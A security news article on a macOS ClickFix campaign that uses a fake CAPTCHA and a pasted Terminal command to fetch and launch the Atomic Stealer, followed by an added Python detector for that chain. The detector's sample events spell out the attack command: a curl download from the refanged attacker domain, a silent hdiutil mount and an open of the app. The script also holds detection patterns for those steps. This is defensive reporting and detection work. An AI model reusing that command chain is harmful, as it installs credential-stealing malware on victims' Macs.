    New macOS ClickFix attack silently mounts DMGs to push infostealer

By admin, June 24, 2026

    A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.

    The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.

    Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.


    Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS’s native hdiutil utility, locates the application bundle it contains, and launches it automatically.

    ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied “fix instructions.” The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.

    While ClickFix attacks involving DMGs are not new, previous campaigns typically relied on users manually opening downloaded DMG files to launch malicious applications or execute scripts from attacker-controlled servers.

    The campaign spotted by Palo Alto combines both approaches by using a Terminal command to quietly download a DMG file and launch the malware it contains.

Malicious Terminal command used as fake CAPTCHA verification (Source: Palo Alto Networks Unit 42)

    After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet “-fsSL” flags and saves it to the /tmp folder under a random filename.

The command then executes ‘hdiutil attach -nobrowse’ to mount the downloaded disk image without displaying it in Finder or on the desktop.

    The script then searches up to three directory levels deep for the first available .app or .pkg installer, and if one is found, launches it using the macOS open command.

    Researchers observed the malware being delivered as a disk image named “s.01M0td.dmg,” which mounted a volume containing a self-signed application bundle named “NNApp.app.”

    This payload is part of the Atomic macOS Stealer family, which is used to steal credentials, browser history, authentication tokens, and cryptocurrency wallets from infected devices.

Infostealer attack flow (Source: Palo Alto Networks Unit 42)

    The stealer will display a fake System Preferences authentication prompt that asks the user to enter their password, allowing the malware to steal it.

    According to the researchers, the malware targets eight Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals cookies, login databases, autofill information, stored payment cards, and browser profile data.

    The stealer also targets Firefox-derived browsers, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser, stealing the same information.

    Palo Alto says the malware searches for and steals cryptocurrency wallet data, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper.

    The malware also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with the PDF, TXT, or RTF extensions.

    All harvested data is then stored in a ZIP archive and uploaded to the attacker’s server, where the attacker can retrieve it.

    Of particular interest, the researchers found that the malware will replace legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to perform crypto theft.

    The campaign was observed using command-and-control servers at svs-verificationdate[.]beer and 196.251.107[.]171.
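The download-mount-launch chain described above (curl writing a .dmg into /tmp, ‘hdiutil attach -nobrowse’, then ‘open’ of the mounted .app or .pkg) and the command-and-control indicators listed here can both be turned into a simple detection over process-start telemetry. The script below is an added example written for this article; it is not code from the article or from Unit 42. It assumes an EDR or log collector that exports one record per process start with the fields ts, pid, ppid and cmd (an assumption about the export format), uses constructed sample events (the /tmp filename and the volume name are made up), and refangs the article's defanged indicators so they can be matched against command lines. It alerts only when the mount step is accompanied by at least one of the other two under the same parent shell, because a lone hdiutil call is ordinary administrative activity.

```python
"""Detect the macOS ClickFix DMG chain (curl -> hdiutil attach -nobrowse -> open)
in process-start telemetry. Added example; record fields and sample events are constructed."""
import re
from collections import defaultdict

# Indicators as published in the article (defanged); refang() restores them for matching.
DEFANGED_IOCS = ["svs-verificationdate[.]beer", "196.251.107[.]171"]


def refang(ioc: str) -> str:
    """Undo common defanging ('[.]' and 'hxxp') so the indicator matches real command lines."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOCS = {refang(i) for i in DEFANGED_IOCS}

# One regex per stage of the chain, applied to the full command line.
STAGE_PATTERNS = {
    # curl with a silent flag (-s, as in -fsSL: fail silently, silent, show errors, follow
    # redirects) whose output path is a .dmg under /tmp
    "download": re.compile(r"\bcurl\b(?=.*\s-\w*s\w*\b)(?=.*/tmp/\S+\.dmg\b)"),
    # hdiutil attach with -nobrowse keeps the mounted volume out of Finder and the desktop
    "mount": re.compile(r"\bhdiutil\s+attach\b(?=.*-nobrowse)(?=.*\.dmg\b)"),
    # open of an application bundle or installer package on a mounted volume
    "launch": re.compile(r"\bopen\b(?=.*/Volumes/\S+\.(?:app|pkg)\b)"),
}


def classify(event: dict) -> list:
    """Return the chain stages (in STAGE_PATTERNS order) that this single event matches."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(event["cmd"])]


def ioc_hits(cmd: str) -> list:
    """Return the known indicators that appear in a command line."""
    return sorted(i for i in IOCS if i in cmd)


def detect_clickfix_dmg(events: list, window: int = 60) -> list:
    """Group stage hits by parent process (the shell Terminal spawned) and raise one alert per
    parent whose hits, within `window` seconds of the first, include the mount step plus at
    least one other step. IOC hits raise the severity."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for stage in classify(ev):
            by_parent[ev["ppid"]].append((ev["ts"], stage, ev))
    alerts = []
    for ppid, hits in by_parent.items():
        first_ts = hits[0][0]
        in_window = [h for h in hits if h[0] - first_ts <= window]
        stages = {stage for _, stage, _ in in_window}
        iocs = sorted({i for _, _, ev in in_window for i in ioc_hits(ev["cmd"])})
        if "mount" in stages and len(stages) >= 2:
            alerts.append({
                "ppid": ppid,
                "stages": sorted(stages),
                "iocs": iocs,
                "severity": "high" if iocs or len(stages) == 3 else "medium",
            })
    return alerts


# Constructed sample telemetry (not real data). Events under ppid 700 mirror the chain the
# article describes; 800 and 900 are benign look-alikes that must not alert.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 701, "ppid": 700,
     "cmd": "curl -fsSL https://svs-verificationdate.beer/s.01M0td.dmg -o /tmp/aB3kQ9.dmg"},
    {"ts": 102, "pid": 702, "ppid": 700, "cmd": "hdiutil attach -nobrowse /tmp/aB3kQ9.dmg"},
    {"ts": 104, "pid": 703, "ppid": 700, "cmd": "open /Volumes/NNApp/NNApp.app"},
    # a developer quietly mounting an installer image they downloaded themselves
    {"ts": 500, "pid": 801, "ppid": 800,
     "cmd": "hdiutil attach -nobrowse /Users/dev/Downloads/Xcode.dmg"},
    # a curl download into /tmp that is not a disk image
    {"ts": 600, "pid": 901, "ppid": 900,
     "cmd": "curl -fsSL https://example.invalid/tool.tar.gz -o /tmp/tool.tar.gz"},
]

if __name__ == "__main__":
    for alert in detect_clickfix_dmg(SAMPLE_EVENTS):
        print(alert)
```

The correlation key is the parent PID because all three steps of the pasted command run from the same shell; on a real fleet you would also check that the shell's ancestor is Terminal (or another interactive terminal) and lower the window to a few seconds, since the whole chain executes without user interaction.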

    As a general rule, users should always be cautious when websites instruct them to open Terminal and execute commands. This is especially true when they claim to be part of CAPTCHA verifications, browser fixes, or other troubleshooting steps. 

    If you do not 100% understand what a command does, do not run it.
